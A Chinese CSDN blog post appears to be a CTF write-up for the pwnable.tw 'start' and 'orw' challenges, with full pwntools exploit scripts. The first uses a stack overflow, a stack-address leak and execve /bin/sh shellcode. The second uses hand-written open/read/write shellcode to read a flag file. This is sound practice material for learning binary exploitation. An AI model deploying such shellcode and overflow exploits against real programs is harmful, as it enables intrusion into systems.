pwnable.tw start,orw学习

最新推荐文章于 2023-09-22 13:19:22 发布
最新推荐文章于 2023-09-22 13:19:22 发布
阅读量209 收藏
点赞数
分类专栏: pwn pwnable.tw
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46521144/article/details/118531388
版权

栈溢出 系统调用 shellcode 栈地址 堆溢出利用
关键词由CSDN通过智能技术生成

暑假开始刷pwnable.tw

start

这个反编译出来一开始看蒙了,不知道在干啥。后来仔细看看字节码,发现是系统调用write输出的stack上的内容。

后面是read函数,观察修改的寄存器内容

发现是read系统调用,输入数据大小为0x3c

然而buffer大小为0x14,这就产生了栈溢出。这里是把一个shellcode放到返回地址,那就需要知道返回的栈地址,这里比较巧妙。注意到

这里将打印esp地址中的数据,只要返回ret的时候调用,就可以输出esp地址,在下一次放在ret地址作为shellcode入口地址。

from pwn import *
context.log_level="debug"
p = process('./start')
# p = remote('chall.pwnable.tw', 10000)

payload = 'A'*0x14 + p32(0x8048087)
p.sendafter("Let's start the CTF:",payload)
stack_addr = u32(p.recv(4))
print 'stack_addr: '+hex(stack_addr)

# pause()

shellcode='\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80'
payload = 'A'*0x14 + p32(stack_addr+0x14)+shellcode
# gdb.attach(p,"b *0x0804809C")
p.send(payload)

p.interactive()

orw

这道题会直接执行shellcode,学到了两个点,一是怎么把字符串写到寄存器地址(利用push+move xxx,rsp)二是手工orw(本来可以用asm做,这里复习一下,发现原来fd记错了)

注意读取到的地址0x804a100在vmmap开辟的一段可写可读区域上

from pwn import *
# io = process('./orw')
io = remote('chall.pwnable.tw',10001)
context.arch="x86"


shellcode="""
mov eax,0x05
push 0x00006761
push 0x6c662f77
push 0x726f2f65
push 0x6d6f682f
mov ebx,esp
xor ecx,ecx
xor edx,edx
int 0x80

mov eax,0x03
mov ebx,0x03
mov ecx,0x804a100
mov edx,0x30
int 0x80

mov eax,0x04
mov ebx,0x01
mov ecx,0x804a100
mov edx,0x30
int 0x80
"""


payload = asm(shellcode)


# gdb.attach(io,"b *0x0804858A")
io.sendline(payload)

io.interactive()

N1ch0l4s
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
pwnable.tw第一题start
计算机小白的博客
08-09 5578
这应该是我做的第一道pwn的题了(虽然也是看了很多别人的WriteUp),想了两天,才终于弄清楚了,在这里记录一下。拿到手以后发现是一个ELF文件,就放进kali虚拟机里面运行一下先: 程序启动以后打印一段话,然后让你输入,就完事了。 再放入IDA中,观察: 检测栈有点问题,不能够F5,强行看汇编。。。 5个push是打印出来的那句话, Let’s start the CTF: 下面一句
cpma的十进制运算指令实用PPT学习教案.pptx
10-06
在这个PPT学习教案中,重点讲解了CPM1A在十进制运算方面的指令,这对于编程和控制系统中的数值处理至关重要。 一、CPM1A的二进制运算指令 1. **单字二进制加法指令 ADB (50)**:此指令用于执行两个单字二进制数的...
pwnable.tw-orw
qq_35661990的博客
10-27 461
Read the flag from /home/orw/flag. Only open read write syscall are allowed to use. nc chall.pwnable.tw 10001 这是pwnable.tw orw的题目描述,只能用syscall只能用open、read、write 从ida看源代码 int __cdecl main(int ar...
pwnable.tw-start
qq_35661990的博客
10-05 921
参考了好多文章才能大致理解shellcode 这题开始就有一个大坑 可以看到不同的checksec查看start文件会有不同的结果,就结果而言,GDB-PEDA的checksec很不靠谱。。我根本没有s命名的文件。。 所以,start是一个32位没有开启NX的程序,NX(DEP)的基本原理是将数据所在内存页标识为不可执行,当程序溢出成功转入shellcode时,程序会尝试在数据页面上执行...
pwnable.tw【start】
weixin_51055545的博客
04-22 352
检查程序 任何保护都没开, 放到IDA中分析: 逆向分析 很简单的一个程序,只有start和exit两个函数,通过分析汇编,我们知道,程序先write出欢迎的语句,然后系统调用read(),来让我们输入,我们输入的栈上是可读可写可执行的,所以我们leak出stack地址,然后控制程序返回到我们构造好的shellcode即可, 思路 1.通过构造write()来leak出栈地址 2.通过控制返回地址,来执行我们的shellcode,从而达到getshell的目的. exp分析: io.recvuntil(
pwnable.tw】start
qq_61670993的博客
09-22 86
对栈布局的分析
pwnable.tw---start
杀生丸?不,其实我要的是桔梗
04-30 1543
Pwnable.tw—start 最近比赛玩了好几天的pwn,发现老是差点火候,开始正式刷刷Pwnable.tw看看。 题目分析: checksec : 第一次遇到什么防护都不开的程序,兴奋。 IDA: 题目只有start和exit。 检测栈有点问题,不能够F5,强行看汇编。。。 .text:08048060 public _start ....
欧姆龙omronPLC指令.pdf
11-16
- `ANDW`,`ORW`,`XORW`:双字逻辑与、或、异或,用于处理双字型数据的逻辑运算。 - `NEG`:求补指令,用于计算二进制数的补码。 6. **浮点数处理指令**: - `FIX`,`FLT`:浮点数与整数之间的转换。 - `+F`,...
MECH3780 CFD Major Assignment.docx
10-21
**学习资源与支持:** 1. 提供的模板帮助学生组织报告结构,确保包含所有必要的技术细节和分析。 2. 有专门的解释视频(https://youtu.be/p7dBNUH3oRw)来辅助理解和完成作业。 3. 如果有任何疑问,可以联系lyazid....
欧姆龙omronPLC指令.docx
11-16
逻辑指令(如ANDW、ORW、XORW、COM等)用于执行位级逻辑运算。 浮点数处理指令(如FIX、FLT、+F、-F、/F、*F等)支持浮点数的运算,这在处理精度要求高的数学问题时是必不可少的。 子程序和中断控制指令允许编写可...
欧姆龙plc指令 (2).docx
11-16
10. **逻辑指令**:`ANDW`、`ANDL`(双字逻辑与)、`ORW`、`ORL`(双字逻辑或)、`XORW`、`XORL`(双字异或)、`COM`、`COML`(双字求补)用于逻辑操作。 11. **特殊算术指令**:如`APR`(算术处理),以及位计数器...
Pwnable.tw start [Writeup]
柷敔的博客
02-18 891
Pwnable.tw start [Writeup] 题源 https://pwnable.tw/challenge/#1 题解 先看一下安全保护情况 再dump一下源码 拖到IDA里一看,也就是内联汇编写的代码(此处略去)。毕竟是入门第一题,都是用的简单的汇编指令。简单注释一下: [line 1]08048060 <_start>: [line 2] 8048060: 54 push %esp ; 泄露了栈地
pwnable.tw--->start 01
程序员晓老九
10-18 183
pwnable.tw 01 前提--->链接 PWNABLE.TW 02 Challenges 01 start IDA似乎看不出啥来 扔到peda里反汇编看一看,因为是x86(file可知),先写再读。 就知道这么点信息,没啥头绪,猜测是shellcode解。 write的长度是0x14,read的长度是0x3c,明显读的比写的长 覆盖_exit的offset是20,两种方法 1 在_start的ret处下断点--->到退出是20,32位对...
pwnable.tw start writeup
jmp esp
09-27 1418
题目.text:08048060 .text:08048060 public _start .text:08048060 _start proc near .text:08048060 push esp .text:08048061 push offset _exit .te
pwnable.tw 第一题之start
像初雪一样自由洒落
04-26 540
今天学长布置了作业,,,做这道题,,, 言承这次遇到的第一个情况,,,就是页面打开了,题目出不来。作为一名安全一份子,一直不会访问外网,流泪。 趁着这次机会,搞定了,参考博客:https://www.wonxun.net/share/444 然后我们来看题 32位的程序,程序什么也没开,,,感觉挺友善的哈 执行效果,,挺好就一个输入点,基本猜测就是栈溢出,,, 用id...
pwnable.tw---orw
杀生丸?不,其实我要的是桔梗
05-01 1554
pwnable.tworw 这题主要考验的是shellcode的自我制作,建议学会Linux Sysycall Reference 再来,或者第一题start彻底搞会。 题目分析: 照例: 就开了栈保护,虽然都没有什么用。 题目开始就是让你输入shellcode。 就用msf随便试了几下,发现有些被过滤了。 调试看看: 发现调用了seccomp,百度了下是一个linu...
pwnable.tworw
qq_61670993的博客
09-22 110
32位orw,很简单没啥好说的。
pwnable.tw 001
foyjog的研究生涯
09-08 610
https://pwnable.tw/的网址,他是一个提供pwn题目的网址,做逆向破解,做做二进制也是必须的,所以也把做这些题目的心得记录下来。 第一题,start,地址为nc chall.pwnable.tw 10000,我们下载这个文件,然后拖入ida进行分析。 很短的代码,贴出来如下:ext:08048060 public _start .text:0804
Pwnable.tw WP
AlexYoung28的博客
08-18 874
Pwnable.tw start 我们分析上图程序的汇编代码: 上图中的第一个方框,其实是将 : Let's start the CTF:  这句字符串压进栈; 第二个方框:其实是 system_write()函数, 参数中 fd =1, 说明是标准输出,也就是将 字符串打印输出在屏幕上; 第三个方框: 其实 标准输入函数,允许输入的长度是 3ch 也就是 60个字节; 但是buffe...
return orw();
最新发布
12-19
return orw()是一个函数调用表达式,它会调用名为orw()的函数,并将函数的返回值作为整个表达式的值返回。 在这个表达式中,orw()表示一个被定义的函数。函数调用的一般形式是函数名后跟一对括号,括号中可以包含...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值